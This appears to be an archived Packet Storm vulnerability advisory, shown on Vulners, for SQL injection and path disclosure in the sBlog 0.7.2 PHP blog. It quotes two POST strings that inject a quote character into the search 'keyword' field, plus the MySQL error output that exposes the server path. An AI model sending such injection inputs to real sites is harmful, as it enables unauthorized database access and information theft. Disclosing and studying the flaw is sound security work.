Lucene search
+L

sBlog.txt

🗓️ 05 May 2006 00:00:00Reported by subjectzero.netType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

sBlog 0.7.2 SQL Injection and Path Disclosure Vulnerability. Unauthenticated attacker execute arbitrary SQL statements, compromising database and exposing sensitive information

Code
`  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
Product : sBlog 0.7.2  
Vulnerability :sBlog SQL Injection and Path Disclosure Vulnerability  
Date of Disclosure : 02/05/06  
Bugtraq ID : 17782  
Summary:  
Software: sBlog 0.7.2  
Site: http://servous.se/  
Description: sBlog is a simple and new PHP Blog.  
  
Issue: Conducting a security benchmark on this open source software we have found that most of the versions of this software is prone to SQL Injection attack through which an attacker can trigger back sensitive information as well as gain administrative priviledges. The sql injection also discloses path information which may prove additional aid to the attacker.An unauthenticated attacker may execute arbitrary SQL statements on the web. This may compromise the database and expose sensitive information.  
  
Exploit :  
1.The sql attack has been tested with these POST variables  
keyword='&search_loc=blog&cat=loc&bounceName=search_blog_to_lycos_uk&query=1  
  
Path Disclosure  
  
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /data/blog/uk/search.php on line 50  
  
Your search for "'" did not return any matches!  
  
2.The sql attack has been tested with these POST variables  
keyword=%27&search_loc=blog&cat=loc&bounceName=search_blog_to_lycos_uk&query=1  
  
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /data/blog/uk/search.php on line 50  
  
Your search for "'" did not return any matches!  
  
This exploit has been tested on existing version . Older versions may also be affected by the same vulenrability.  
  
Author's Report : The Vulnerability has been reported .  
  
Patch Status : Not Available.   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4
16